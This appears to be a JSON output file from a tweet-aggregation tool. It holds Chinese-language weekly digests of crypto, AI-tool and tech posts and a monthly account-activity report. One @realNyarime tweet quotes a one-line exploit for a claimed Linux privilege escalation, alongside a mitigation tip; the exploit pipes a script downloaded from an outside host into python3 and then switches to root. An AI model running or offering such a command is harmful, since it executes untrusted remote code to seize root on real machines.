最近主攻各平台的嘴撸创作者赛道,不卷且能稳定产出收益。这波参与的是 @MindoAI 和 @useTria 的联合活动 🎯 策略上我依然聚焦推文创作,辅以低磨损的轻交互。活动需要交易量和办卡,门槛确实比纯内容局高,但我不会去死磕资金堆量的维度,找准自己优势位最重要 📊 Tria交互链接:http://app.tria.so/?accessCode=3RPJYP7003&utm_source=…\n[原文链接](https://x.com/chuxiaeth/status/2049351176433623539)\n\n**[2026-04-28T08:48:42+00:00]**\n> Pinned: 04年女大,在美国。元气少女,活力满满,Web3菜鸟,希望多向各位大佬学习。\n[原文链接](https://x.com/chuxiaeth/status/2049048148660965739)\n\n**[2026-04-28T08:38:27+00:00]**\n> 开始上 >@TermMaxFi 了,是不是有些晚了,按照网上的教程,每天来签到,再写一篇推特的帖子,拿MP空投积分。 #TermMax 是 DeFi 固定利率借贷与循环借贷策略类的项目。预计今年Q2发币。\n[原文链接](https://x.com/chuxiaeth/status/2049045566857064461)\n\n**[2026-04-28T08:30:58+00:00]**\n> R to @chuxiaeth: 比特币橙子哥的推是 @oragnes 原推有误\n[原文链接](https://x.com/chuxiaeth/status/2049043685094907944)\n\n**[2026-04-28T08:25:44+00:00]**\n> 《Cursor 官方扶持的 AI & Web3 创作者名录》 @cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。 以下是这 15 位获得资助的创作者及其核心画像(顺序随机): 1. Jason Zhu @GoSailGlobal 独立开发者,主要分享 SaaS 出海…\n[原文链接](https://x.com/chuxiaeth/status/2049042369530777747)\n\n**[2026-04-26T23:40:41+00:00]**\n> - @RiverdotInc 第五季创作者排名战正式打响🏆 赛季时间:4月22日 → 26年Q2结束📅 这一季的主题就是 RIVER 质押 + 合作活动,我也会继续在现场肝建设🛠️ 另外,第四季空投会在结算完成后开放领取🪂,别忘了蹲 @River4fun 💧 我也已经加入到第五季的战斗\n[原文链接](https://x.com/chuxiaeth/status/2048547844982976544)\n\n**[2026-04-26T23:33:15+00:00]**\n> - @ferra_protocol 居然也上贵金属永续合约了🥇 现在是个项目都在往链上合约赛道挤🔗,蛋糕基本被分干净了 如果你是 SUI 链老玩家,又对贵金属合约有执念,可以多蹲蹲 #Ferra,这也是我捂了很久一直在撸的项目💰 交互链接: https://ferra.ag?code=tBYQfU0aq 进去直接点 Perpetuals 就能开搞⚡️ #DEXonSui 🚀\n[原文链接](https://x.com/chuxiaeth/status/2048545974747070599)\n\n**[2026-04-26T02:36:06+00:00]**\n> 好久不见,宝子们,近来可好啊\n[原文链接](https://x.com/chuxiaeth/status/2048229604784308266)\n\n---\n\n### ⚠️ @二级炒家 — 二级炒家(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ✅ @wolfyxbt — 杀破狼(12 条)\n\n**[2026-04-27T13:59:57+00:00]**\n> 最近想玩链游的可以看看 @RealGoOfficial 这个游戏 他们刚刚拿到了 350w 美金融资,这个行情能融到这个数字算很不错了。苹果商店和谷歌商店现在都可以下载,玩法类似 Pokemon GO,出门走路到现实世界抓 Meme 宠物,然后收集、升级、融合、组队、社交。 他们提出 Meme 3.0 的概念,想去做一些 Meme 相关的生态基建,现在和几个 Meme 的大 IP 都有合作,比如…\n[原文链接](https://x.com/wolfyxbt/status/2048764088193569049)\n\n**[2026-04-27T01:55:58+00:00]**\n> 不要骂我了,山寨季已经来过了 $TRUMP 发币前后就是山寨季,就是本轮牛市山寨币流动性最充沛的时间段。 觉得没来的,大部分是自己没赚到钱,我觉得要反省一下,不反省的话,下一轮山寨季也大概率賺不到钱。 山寨币是赚钱容易而已,不是所有人都赚钱。\n[原文链接](https://x.com/wolfyxbt/status/2048581892333867398)\n\n**[2026-04-26T04:01:04+00:00]**\n> 嗨 @nikitabier @elonmusk 你们两个,能不能快点解决这个问题,你们的检测机制,把我一堆活人朋友们都误封了,然后这些真正的机器人账号,我每一次发帖都会出现。 我真的球球你们了,去追踪这几个关键词就可以了:男大、弟弟、同城、哥哥、万达广场、线下、主人、搭子、固炮、单男。\n[原文链接](https://x.com/wolfyxbt/status/2048250984644960630)\n\n**[2026-04-26T02:11:07+00:00]**\n> 卧槽,川普又被枪击了 😱\n[原文链接](https://x.com/wolfyxbt/status/2048223317019316568)\n\n**[2026-04-25T15:08:21+00:00]**\n> 因为上帝造人的时候,是把生殖器设计给你们繁殖的,不是设计给你们进食的。\n[原文链接](https://x.com/wolfyxbt/status/2048056527731454048)\n\n**[2026-04-25T13:32:07+00:00]**\n> R to @wolfyxbt: Image\n[原文链接](https://x.com/wolfyxbt/status/2048032308637442215)\n\n**[2026-04-25T13:30:27+00:00]**\n> 2019 年,孙哥放了巴菲特的鸽子; 2026 年,嗯哼放了特朗普的鸽子。 币圈真是个神奇的地方!\n[原文链接](https://x.com/wolfyxbt/status/2048031889789972748)\n\n**[2026-04-25T10:03:02+00:00]**\n> 虽然比特币回到 77,000 了,但是我还是非常悲观的 我理想中的抄底价格是 35,000 的比特币 感觉现在币圈虽然看起来一片欣欣向荣,但是更像是虚假繁荣,拉盘的全是一些强控筹的山寨币和小市值的 Meme,主流币除了 $BTC 和 $ETH 稍微涨了一点,其他大市值的山寨比如 $DOGE 和 $SOL 根本涨都涨不动。 这种底我根本不敢抄呀,抄在半山腰至少得难受一年。 感觉现在这种行情像是跌太…\n[原文链接](https://x.com/wolfyxbt/status/2047979690623955107)\n\n**[2026-04-25T08:01:04+00:00]**\n> 我靠 Cursor 刚刚送了我 10,000 美金的额度! 感谢 @cursor_ai @edwinarbus 的恩赐,这周马上回归使用 Cursor!\n[原文链接](https://x.com/wolfyxbt/status/2047948998250840240)\n\n**[2026-04-25T05:22:04+00:00]**\n> 我过去 2 周的总曝光量是 1320 万,收益是 1799.75 美金。 平均算下来,每 1 次曝光有 0.000136 美金的收益; 每 1 万次曝光 1.36 美金的收益。\n[原文链接](https://x.com/wolfyxbt/status/2047908983101628720)\n\n**[2026-04-25T03:15:14+00:00]**\n> R to @wolfyxbt: 为了利于大家分析,这里发一下我自己的后台数据\n[原文链接](https://x.com/wolfyxbt/status/2047877064104284194)\n\n**[2026-04-25T02:27:20+00:00]**\n> 卧槽!牛逼牛逼! 这两周的工资涨到了 1799 美金! Thank you Elon Musk!\n[原文链接](https://x.com/wolfyxbt/status/2047865010182148284)\n\n---\n\n### ✅ @runes_leo — Leo(20 条)\n\n**[2026-05-01T15:03:25+00:00]**\n> 终于。 Claude Code 长 session 跑久了,/resume 卡到怀疑人生,每次启动还得等最慢那个 MCP 拖几秒到十几秒——CC 重度用户应该都熟。这次一波修了。 实打实有体感的两条: • /resume 在 40MB+ session 上快了 67%,50MB 的 /branch 上限也砍了——我自己 subagent 转录飙到过 122M(人家 50MB 上限的两倍多),主 …\n[原文链接](https://x.com/runes_leo/status/2050229609795407876)\n\n**[2026-05-01T08:17:19+00:00]**\n> Anthropic 这招真狠,所有 Claude Code 用户都该看一眼。 @theo 做了个最干净的实验: 建一个空 Git 仓库,commit 只放一行 JSON: {\"schema\": \"openclaw.inbound_meta.v1\"} 调用官方 Claude Code —— 直接报错\"out of extra usage\"。 要么拒绝请求,要么强制多收一份钱。 0 行业务代码,只因…\n[原文链接](https://x.com/runes_leo/status/2050127414630469937)\n\n**[2026-05-01T06:14:26+00:00]**\n> Karpathy 这场 Sequoia 演讲把 AI 编程下个阶段讲透了,最有感触的是第 6 条。 1. Software 3.0 来了。 1.0 写代码,2.0 训神经网络,3.0 在 LLM 的 context 里用自然语言\"编程\"。 2. 2025-12 是拐点。 生成代码块变大变连贯,编程的最小单位从\"写代码\"升级到\"委派任务\"。 3. 神经网络会成主计算层。 未来不是 CPU 上跑神经…\n[原文链接](https://x.com/runes_leo/status/2050096487967695197)\n\n**[2026-05-01T00:38:00+00:00]**\n> 38k 星的 skill 仓库。 上周抄了 1 个 grill-me,今天又加了另外 2 个。 一个是 /tdd 思路。 动手前先写一行——跑完应该长啥样。 对得上才往下走。 加进自己的自检流程,只用于策略代码或 API 调用那类—— 跑了对不对要 grep log 才知道的场景。 skill 没装,精华抄过来了。 另一个是他 SKILL.md 的渐进式骨架。 照着写了个模板,下次新写 skil…\n[原文链接](https://x.com/runes_leo/status/2050011821352829116)\n\n**[2026-04-30T11:23:46+00:00]**\n> R to @runes_leo: github.com/runesleo/claude-v…\n[原文链接](https://x.com/runes_leo/status/2049811948653752753)\n\n**[2026-04-30T11:23:46+00:00]**\n> 开源视频管线 claude-video-kit 升级 比上一版多了: · 加了一个真实跑通的示例(就是上面这条视频的 script.json,10 个 slide / 46 秒,clone 完改改字段就能跑自己的) · Remotion / ffmpeg 版本锁定 + 音频标准化配方 · 声纹 ref 改环境变量 · v0.2 视觉路线图(双语小标签 / 双色高亮 / emoji 数据卡 / 双…\n[原文链接](https://x.com/runes_leo/status/2049811945528893682)\n\n**[2026-04-30T10:02:00+00:00]**\n> Warp 开源那天我没换。 为啥?看了眼 license 直接乐了。 repo 是 2021 年 7 月就建了,闭源跑了快 5 年,4/28 突然开源——但选的不是 MIT 也不是 Apache,是 AGPL-3.0。 AGPL 就是那个专门防 AWS 白嫖的协议。 你想啊,开源数据库选 MIT,AWS 直接拿去包成 RDS 赚几十亿,你一分钱看不到。选 AGPL,AWS 必须把改动也吐出来——…\n[原文链接](https://x.com/runes_leo/status/2049791371364479224)\n\n**[2026-04-30T07:00:14+00:00]**\n> R to @runes_leo: 完整版(英文 / 3 小时干货): https://www.youtube.com/watch?v=7xTGNNLPyMI 强烈建议看完整版。\n[原文链接](https://x.com/runes_leo/status/2049745624703320340)\n\n**[2026-04-30T07:00:13+00:00]**\n> R to @runes_leo: 刚实测,第一反应仍然是「9.11 更大」,靠把 9.9 写成 9.90 这一步才把自己绕回来。😂\n[原文链接](https://x.com/runes_leo/status/2049745621159145603)\n\n**[2026-04-30T07:00:07+00:00]**\n> ChatGPT 能解 PhD 物理题,9.11 比 9.9 这道小学数学题,第一反应还是会答错。 不是它笨,是它根本看不见这串字符。 Karpathy 三小时讲 LLM 的新视频里专门讲了原因——做了个 60 秒解读 👇\n[原文链接](https://x.com/runes_leo/status/2049745599105572981)\n\n**[2026-04-30T06:07:18+00:00]**\n> 看了一圈大 V 解读 Cursor SDK 的爆款推, 都在讲它多牛、什么操作系统、范式转移。 我说说一夜实测的真实数据。 我手搓了 5 天的 AI 自动化, 今天被官方版替了。 5 天前用 Cursor 命令行 + bash 脚本搓的, 让它在后台 7×24 跑各种重复但费脑的活 (拆解、扫描、整理这类)。 烧 $10K 免费额度。 跑得不算丝滑: 经常卡顿,产出格式飘移, 脚本日志显示我跑「…\n[原文链接](https://x.com/runes_leo/status/2049732305829454015)\n\n**[2026-04-30T04:34:09+00:00]**\n> R to @runes_leo: 想体验 Typeless 可以走这个链接🫡 https://www.typeless.com/?via=leo-x\n[原文链接](https://x.com/runes_leo/status/2049708861679153445)\n\n**[2026-04-30T04:34:08+00:00]**\n> 搞 AI 的同行 +1,但有个反差:我 Dock 上没有 Claude 和 Codex 的 App 图标,就一个终端做入口。 用 Ghostty 还得专门感谢刷到 @wangray 的这个推荐,从 iTerm 迁过来体验确实有提升。 我每天就 2 个图标: 1. Ghostty 终端:Claude Code + Codex + ssh + pm2 一切的一切唯一入口 2. Typeless:语音…\n[原文链接](https://x.com/runes_leo/status/2049708857598107988)\n\n**[2026-04-30T02:16:00+00:00]**\n> 搭了一条管线:B站 3.5h 长访谈 → 30 分钟出文章 + http://leolabs.me 网站部署。 刚跑通的是张小珺采访小米罗福莉 3.5h 视频。零外部 API 成本,全本地: → B站 API 绕 412 拿音频 → mlx-whisper(small 模型,31x 实时,本地 7min 转完) → Haiku subagent 分章节摘要 → 主线程 Opus 合稿 + 卡片 …\n[原文链接](https://x.com/runes_leo/status/2049674096041189620)\n\n**[2026-04-29T23:27:00+00:00]**\n> 没建工作流前,每天起床打开 X 刷一会儿就开始焦虑——爆款看不完、KOL 推文跟不上、PM 平台又升级了不知道哪条该 follow。 现在每天 30 分钟跑一次 /today + /morning,把当天外部信息流梳成可执行清单: 合计 31 条 · 预计 6-8h 消化完 每条都明确动作:写推 / 评估装不装 / 扫一眼跳过 / 私享给付费读者 / 进 backlog 推到周日。 跑完那一刻焦…\n[原文链接](https://x.com/runes_leo/status/2049631565710528661)\n\n**[2026-04-29T15:38:00+00:00]**\n> 今天才发现自己 80.8% 的 Claude Code skill 是装废的。 读 Tw93 这篇学到了,description 写\"用于 X / X workflow\"是\"功能介绍型\",AI 主线程根本看不到何时该调它。 52 个 skill 一直纳闷 codeburn 这个月 subagent 调用率为啥才 0.18%,可能的原因找到了。 今天全改成 Use when + NOT when,…\n[原文链接](https://x.com/runes_leo/status/2049513537966674317)\n\n**[2026-04-29T13:16:00+00:00]**\n> Day 5 — Cursor 送的 $10K 刚烧到 $164,刚 1.64%。慢得我自己都着急。 本来以为\"路还长\",今天才发现不是慢的问题,是方向错了。 我现在 3 个 worker 并行在跑:白天我自己开 Claude / Codex 终端推任务,夜里 Codex loop 烧策略 / 数据基座的额度,Cursor 24/7 跑 daemon 一直不停。 之前我把 Cursor 这个 lo…\n[原文链接](https://x.com/runes_leo/status/2049477802978664657)\n\n**[2026-04-29T11:27:00+00:00]**\n> Polymarket V2 cutover 24 小时观察。 把十几个策略账户的 USDC.e 全部迁到 pUSD,verify + smoke PASS。一起来观察下第一天的市场反应。 --- 【数据层】@lnkybtc 秋田老师的链上数据最直观: • V2 部署后 4 小时,pUSD 发行 1.7 亿美元,186 万笔转账,68,686 个持有地址 • 6 小时内,PM TVL 4.5 亿里…\n[原文链接](https://x.com/runes_leo/status/2049450372285046792)\n\n**[2026-04-29T10:38:03+00:00]**\n> Anthropic ships changelogs. OpenAI ships vibes.\n[原文链接](https://x.com/runes_leo/status/2049438052310020226)\n\n**[2026-04-29T09:40:13+00:00]**\n> Claude Code 加了 push 通知,任务跑完手机叫你,让你能从终端走开。 但通知再快也是要人读的。我并不想读。 我有几个 TG 频道接监控,策略告警/异常/系统/信号分开收,每天未读消息几十条。但还是要我自己打开看:是真需要动手处理,还是又一次正常状态监控。这跟没提醒区别不大。 懒人的真需求不是\"通知更快\",是 AI 替我读完那条告警,归类、判断、给一行结论:这条 P0 现在去改 / …\n[原文链接](https://x.com/runes_leo/status/2049423498494566836)\n\n---\n\n### ⚠️ @oranges — 比特币橙子(获取失败)\n\n- 错误: snscrape=snscrape_unavailable: No module named 'snscrape'; nitter=URLError: ; rsshub=HTTPError: HTTP Error 503: Service Unavailable\n\n### ✅ @realNyarime — 奶昔(20 条)\n\n**[2026-05-01T14:03:27+00:00]**\n> 近期市面上出现eLink可编程eUICC实体卡,芯片布局上与eSTK极其相似,暂不明确该卡的EID及制造厂商 不做推荐,我已在他们淘宝店「eLink Store」下单 目前市面上的实体eSIM卡均不可缺少的功能: 支持自定义ARA-M权限配置 兼容各类写卡软件及读卡器读写 并可通过STK菜单实现eSIM Profile下载、切换与管理\n[原文链接](https://x.com/realNyarime/status/2050214520162038238)\n\n**[2026-05-01T09:17:00+00:00]**\n> 那些餐饮店的饮料还以为是做慈善 原来进货价就1毛钱一瓶水实测可以买很多瓶 自己有多少个号买多少个号,应该不是敌敌畏 0.1🉐百花蜂蜜500g https://u.jd.com/fOY2tiP 0.1🉐弱碱苏打水300ml*1瓶 https://u.jd.com/fgYnQ2p 0.1🉐金银花罗汉果茶360ml*1瓶 https://u.jd.com/fOYTQzZ 0.1🉐百合绿豆水400ml*…\n[原文链接](https://x.com/realNyarime/status/2050142432088526883)\n\n**[2026-05-01T08:55:20+00:00]**\n> 从昨天开始有不少网友反馈iOS推送异常,原因未知 在对 http://push.apple.com 分流后仍无法接到Telegram等App推送,切换外区Apple ID后恢复,但CN直连失败 这是Apple自App Store对中国大陆IP重定向至/cn(国区商店)后,进一步限制移动端设备推送,暂不影响macOS\n[原文链接](https://x.com/realNyarime/status/2050136980454031800)\n\n**[2026-05-01T07:02:32+00:00]**\n> 小米之家河南限定五一礼物钧瓷已拿到 还送了水和王者明信片,汝窑会更好看,天青色 对了,其实周杰伦的青花瓷这首歌最初写词是写的汝瓷 不知道为啥换名字了 青花瓷是靛蓝或者宝石蓝,不是天青色\n[原文链接](https://x.com/realNyarime/status/2050108592246984780)\n\n**[2026-05-01T06:32:41+00:00]**\n> 跟推友问好👋 有一个问题想问大家🙋 放假都没出去,看了一圈好像没什么好玩的地方🤔 所以想问问,有什么值得两人旅行的地方?😳\n[原文链接](https://x.com/realNyarime/status/2050101082433720730)\n\n**[2026-05-01T05:42:39+00:00]**\n> 避雷一下中国电信英国(CTExcel UK) 虽然补卡费用30块(3英镑),但为了恶心你一下增加了库存机制 头一次听到补eSIM还能有“库存”这一说法的,这eSIM又不是实体卡,居然还能补卡卡池库存不足🤣🤣🤣\n[原文链接](https://x.com/realNyarime/status/2050088491925815667)\n\n**[2026-05-01T03:00:08+00:00]**\n> 至于说eSIM太贵,如果愿意折腾也可以省钱。分享一期中国大陆5天无限流量(每天5G高速)仅需25THB约5.24CNY 先领取优惠👇🏻 https://s.ee/superalink 再购买中国大陆套餐👇🏻 https://s.ee/superalinkcn 这里需要右上角改成THB(泰铢),语言还是保持中文。确定支付金额是否为:25泰铢,约5.24CNY,如果你发现价格不对,请回到第一个链接领…\n[原文链接](https://x.com/realNyarime/status/2050047591191384162)\n\n**[2026-04-30T18:49:33+00:00]**\n> 还得是投行的女高管,操控股价有水平的\n[原文链接](https://x.com/realNyarime/status/2049924132037693573)\n\n**[2026-04-30T17:00:21+00:00]**\n> 这下不止中国大陆,连香港到美的互联也要玩烂了! FCC表决撤销中资运营商的一揽子授权之提议,目的是堵住 2022 年的法律漏洞:即使「中资运营商」的通信牌照被撤销,它们仍可根据一揽子授权(Blanket Authority)自动获得美国国内的州际电信服务资质 会议中最激进的部分是关于禁止互联(Interconnection)的讨论,即讨论将从物理上禁止Verizon、AT&T等美资运营商与中资运…\n[原文链接](https://x.com/realNyarime/status/2049896651989614721)\n\n**[2026-04-30T16:33:28+00:00]**\n> N26关门了,中港澳台全部不接受\n[原文链接](https://x.com/realNyarime/status/2049889887684616218)\n\n**[2026-04-30T15:31:15+00:00]**\n> 所以GPT的Plus和Team额度差多少\n[原文链接](https://x.com/realNyarime/status/2049874226778452072)\n\n**[2026-04-30T14:23:38+00:00]**\n> R to @realNyarime: 4月29日,据广州市天河区投资服务中心官方公众号“投资天河”发布消息,科技巨头谷歌已于28日正式签订合同,入驻位于天河CBD珠江新城的城市地标广州国际金融中心(西塔),将率先落地跨境数智赋能服务创新项目,预计今年第三季度正式投入运营。谷歌方面将联合各方优势资源,推出多项创新科技服务。 据了解,谷歌将在广州天河整合全球领先的科技资源,为内地跨境电商企业提供近距…\n[原文链接](https://x.com/realNyarime/status/2049857210659070441)\n\n**[2026-04-30T14:22:45+00:00]**\n> 据羊城晚报报道,谷歌落地广州,入驻位于天河 CBD 珠江新城地标广州国际金融中心(西塔) 将率先落地跨境数智赋能服务创新项目,主打跨境电商业务,预计今年 Q3 正式投入运营 谷歌方面将联合各方优势资源,推出多项国内首创科技服务\n[原文链接](https://x.com/realNyarime/status/2049856990957236483)\n\n**[2026-04-30T13:13:12+00:00]**\n> 这下压力给到CAAC了, 不过当年不予公开的原因是,可能危及国家安全、社会稳定😣\n[原文链接](https://x.com/realNyarime/status/2049839485610029262)\n\n**[2026-04-30T12:41:34+00:00]**\n> 88code以前也是L站的富可敌国之一,后面因为N佬(另一位富可敌国)的PrivNode以10元出售66万债务影响,一直都没退款 主体是北京灵伊智能科技有限公司,本质上是AI中转站,去年年底就有多名佬友反应高峰不可用、故障率高等问题,特别是挂了没有通知 借雪踏乌云佬的帖提一嘴,采买第三方API服务应当多留意一下,避开这类有前科的AI中转站以免造成不必要的经济损失\n[原文链接](https://x.com/realNyarime/status/2049831528109326356)\n\n**[2026-04-30T08:18:44+00:00]**\n> 下载NVIDIA App,领取《鸣潮》游戏礼包 包含游戏道具:高级能源核心 x 2、高级能量袋 x 1、贝币 x 20000。 数量有限,兑完即止。(本活动仅适用于中国大陆用户) 本活动将于 2026 年 6 月 10 日结束。\n[原文链接](https://x.com/realNyarime/status/2049765382433755229)\n\n**[2026-04-30T07:35:26+00:00]**\n> 深飘新工作:AI账号订阅工程师 寻找负责批量化开通低价渠道的,维护稳定性和可用性,需要有经验的!!\n[原文链接](https://x.com/realNyarime/status/2049754484071629206)\n\n**[2026-04-30T06:28:55+00:00]**\n> 看到Xint Code研究团队放出的CVE-2026-31431简直是王炸,换句话说通杀所有Linux发行版,致使低权限账户获得root权限: curl https://copy.fail/exp | python3 && su CVE-2026-31431 建议尽快更新系统,事态紧急可以先打个补丁 echo \"install algif_aead /bin/false\" > /etc/modp…\n[原文链接](https://x.com/realNyarime/status/2049737746563158361)\n\n**[2026-04-30T04:27:38+00:00]**\n> 本质上是个套壳的浏览器,通过MitM、内置的DoH和自签名根证书(Scholar Root CA v1 和 Scholar Service V2)信任劫持实现流量引导,并且有实时清理DOM元素的能力 例如:维基百科的首页,新闻动态、你知道吗全部被动态清零,YouTube整个/watch都是被屏蔽的,只允许看指定的博主的视频,至于http://google.com也不是全白名单 专用 DoH 服务…\n[原文链接](https://x.com/realNyarime/status/2049707224940089709)\n\n**[2026-04-30T03:30:29+00:00]**\n> 昨晚因发布GPT的活动内容导致了冻结 以后还是不发这类促销活动了,以免再发生类似的事 在申诉后的12小时,登录过后要求我删除那篇帖子,在删除过后就恢复了 这类内容烦请移步奶昔论坛 感谢多位推友的关心及问候,谢谢你们。\n[原文链接](https://x.com/realNyarime/status/2049692840901652531)\n\n---\n", + "monthly_analysis_md": "# X平台资讯深度分析报告\n\n**报告日期**: 2026-05-01T19:38:36.469180+00:00\n**分析账号**: 44个 | **活跃账号**: 34个 | **推文总量**: 478条\n\n---\n\n## 一、总体概览\n\n- 本报告基于 X 关注列表近30天 RSS 数据自动生成。\n- 默认口径:按账号聚合、按推文主题词粗分层。\n\n## 二、主题分布\n\n- **其他**:321 条\n- **模型能力**:113 条\n- **算力与芯片**:23 条\n- **交易与市场**:16 条\n- **投融资与并购**:5 条\n\n## 三、活跃账号 Top10\n\n- @pmarca: 20 条\n- @jason: 20 条\n- @sama: 20 条\n- @lxfater: 20 条\n- @GoSailGlobal: 20 条\n- @paulg: 20 条\n- @runes_leo: 20 条\n- @HarryStebbings: 20 条\n- @realNyarime: 20 条\n- @dingyi: 20 条\n\n## 四、代表性推文\n\n- @GaryMarcus | 2026-05-01T19:28:41+00:00\n - If you think you are going to get alignment out of LLMs you are sadly mistaken. If you live in a society in which people are rolling out LLMs at massive scale, without a robust so…\n - https://x.com/GaryMarcus/status/2050296366161940584\n- @pmarca | 2026-05-01T19:26:58+00:00\n - Important, and obviously true. https://psyche.co/ideas/have-online-worlds-become-the-last-free-places-for-children\n - https://x.com/pmarca/status/2050295934920302777\n- @Stv_Lynn | 2026-05-01T18:47:37+00:00\n - Media\n - https://x.com/Stv_Lynn/status/2050286033552736527\n- @jason | 2026-05-01T18:43:18+00:00\n - Enjoyed visiting MSG South in the seventh borough, Atlanta, last night… see y’all in the sixth borough (Philly) where we will beat the @sixers in six games @GovernorShapiro @david…\n - https://x.com/jason/status/2050284947345486290\n- @GaryMarcus | 2026-05-01T18:41:17+00:00\n - AI and GDP - what does it mean? Sure, AI is “contributing” to GDP — but @davidsacks really nails it below, “Paying people to dig holes and fill them back up increases GDP, as it i…\n - https://x.com/GaryMarcus/status/2050284439343862266\n- @CuiMao | 2026-05-01T18:31:06+00:00\n - 哈哈 @OpenAI 官号换掉了banner了 很明显,他们想再一次用这种画风重新走一遍当时4o宫崎骏现象级爆款。难,难啊。\n - https://x.com/CuiMao/status/2050281878322811194\n- @0xAA_Science | 2026-05-01T18:31:03+00:00\n - 一直想要个越野摩托车,这次张雪出了 MX250,支持一下。\n - https://x.com/0xAA_Science/status/2050281865245024365\n- @jason | 2026-05-01T18:25:15+00:00\n - Bill, the Knicks have won the east\n - https://x.com/jason/status/2050280406461677908\n- @GaryMarcus | 2026-05-01T18:22:55+00:00\n - One of the things I hate the most about this site is the consistent lack of nuance. That’s why everything is an argument, and progress here is so rare.\n - https://x.com/GaryMarcus/status/2050279819347448258\n- @GaryMarcus | 2026-05-01T18:21:24+00:00\n - I have many beefs with Dario and don’t trust him or his hype — but he has certainly eaten OpenAI’s lunch, despite their immense initial lead. Maybe “clown” isn’t the right word he…\n - https://x.com/GaryMarcus/status/2050279436717785406\n- @pmarca | 2026-05-01T18:08:02+00:00\n - Concerning.\n - https://x.com/pmarca/status/2050276070952517767\n- @GaryMarcus | 2026-05-01T18:04:30+00:00\n - Meta is basically Black Mirror incarnate.\n - https://x.com/GaryMarcus/status/2050275183223857462\n- @GaryMarcus | 2026-05-01T18:04:01+00:00\n - “Marcus’ specific point about coding is structurally important: a model that produces code which compiles and passes the tests it was given is not the same as a model that produce…\n - https://x.com/GaryMarcus/status/2050275059361792137\n- @sama | 2026-05-01T18:01:58+00:00\n - you know what all of these \"which is better\" polls are silly use codex or claude code, whatever works best for you i am grateful we live in a time with such amazing tools, and gra…\n - https://x.com/sama/status/2050274547061129577\n- @liuliu | 2026-05-01T17:33:05+00:00\n - What's harder for outsiders to understand is the falling of Deep Research inside @GeminiApp. On the other hand, Deep Research in @OpenAI is improving. Even so, nothing matches wha…\n - https://x.com/liuliu/status/2050267276893708414\n- @GaryMarcus | 2026-05-01T17:30:46+00:00\n - Elon Musk, Sam Altman, the future of humanity, and … goblins. Terrific interview @theinformation with @rocketalignment https://www.youtube.com/live/zh70d6CyuCo?si=WIZJnwKnYEy5Pugl\n - https://x.com/GaryMarcus/status/2050266692732014689\n- @charliebilello | 2026-05-01T17:18:23+00:00\n - Last 10 Years NVIDIA $NVDA: +22,875% Bitcoin $BTC: +17,205% $AMD: +10,030% Tesla $TSLA: +2,362% Apple $AAPL: +1,233% Google $GOOGL: +999% Netflix $NFLX: +932% Microsoft $MSFT: +84…\n - https://x.com/charliebilello/status/2050263578188333549\n- @Pluvio9yte | 2026-05-01T17:15:15+00:00\n - Damn!确实如此,所有AI编程工具都在卷模型智能,但现在满足基本的生产力了,转而让人崩溃的根本不是模型笨,是它每次开会话都失忆😅 AGENTS.md塞不下100万token的领域知识, RAG搜不到\"未知的未知\", 我自己维护Skills维护到想吐。 在公司里,新人入职花两周pair一下就能内化领域知识。 现在跟AI协作,每个新session都是\"新人第…\n - https://x.com/Pluvio9yte/status/2050262789256859872\n- @Pluvio9yte | 2026-05-01T17:07:00+00:00\n - 说个暴论,这个一百多万阅读帖子下的评论区里说\"Claude Code杀死了我的大脑\",其实90%搞反了因果🤯🤯🤯 我自己用CC大半年,直接把省下来的执行时间全砸在了架构设计上,脑子不但没退化反而比以前转得更快 以前写代码,80%时间花在执行(查文档、写代码、修bug),20%花在设计。现在执行交给Claude或者Codex了,只有两种结果: 1. 如果把省…\n - https://x.com/Pluvio9yte/status/2050260712858210516\n- @charliebilello | 2026-05-01T17:03:07+00:00\n - #FF @PeterMallouk, a great follow!\n - https://x.com/charliebilello/status/2050259734930800740\n\n---\n\n*本报告由系统自动生成,供月度复盘使用。*\n", + "paths": { + "tweet_summary_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/推文汇总_202605.md", + "monthly_analysis_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/月度深度分析_202605.md" + } +} \ No newline at end of file diff --git a/data/x_brief/latest.json b/data/x_brief/latest.json new file mode 100644 index 0000000..20aa285 --- /dev/null +++ b/data/x_brief/latest.json @@ -0,0 +1,5353 @@ +{ + "generated_at": "2026-05-01T19:38:36.469180+00:00", + "report_type": "weekly", + "input": { + "watchlist_path": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/简报配置.md", + "watchers": [ + { + "handle": "karpathy", + "name": "Andrej Karpathy" + }, + { + "handle": "sama", + "name": "Sam Altman" + }, + { + "handle": "DarioAmodei", + "name": "Dario Amodei" + }, + { + "handle": "AravSrinivas", + "name": "Aravind Srinivas" + }, + { + "handle": "AndrewYNg", + "name": "Andrew Ng" + }, + { + "handle": "cursor_ai", + "name": "Cursor" + }, + { + "handle": "ylecun", + "name": "Yann LeCun" + }, + { + "handle": "JeffDean", + "name": "Jeff Dean" + }, + { + "handle": "soumithchintala", + "name": "Soumith Chintala" + }, + { + "handle": "gregbrockman", + "name": "Greg Brockman" + }, + { + "handle": "GaryMarcus", + "name": "Gary Marcus" + }, + { + "handle": "elonmusk", + "name": "Elon Musk" + }, + { + "handle": "paulg", + "name": "Paul Graham" + }, + { + "handle": "naval", + "name": "Naval Ravikant" + }, + { + "handle": "pmarca", + "name": "Marc Andreessen" + }, + { + "handle": "david_tiantian", + "name": "David Tian Wang" + }, + { + "handle": "morganhousel", + "name": "Morgan Housel" + }, + { + "handle": "eladgil", + "name": "Elad Gil" + }, + { + "handle": "DavidSacks", + "name": "David Sacks" + }, + { + "handle": "HarryStebbings", + "name": "Harry Stebbings" + }, + { + "handle": "jason", + "name": "Jason Calacanis" + }, + { + "handle": "charliebilello", + "name": "Charlie Bilello" + }, + { + "handle": "WarriorTrading", + "name": "Warrior Trading" + }, + { + "handle": "CryptoCred", + "name": "Credible Crypto" + }, + { + "handle": "AltcoinBuzz", + "name": "AltcoinBuzz" + }, + { + "handle": "svwang1", + "name": "王川(硅谷)" + }, + { + "handle": "bozhou_ai", + "name": "泊舟" + }, + { + "handle": "lxfater", + "name": "铁锤人" + }, + { + "handle": "berryxia", + "name": 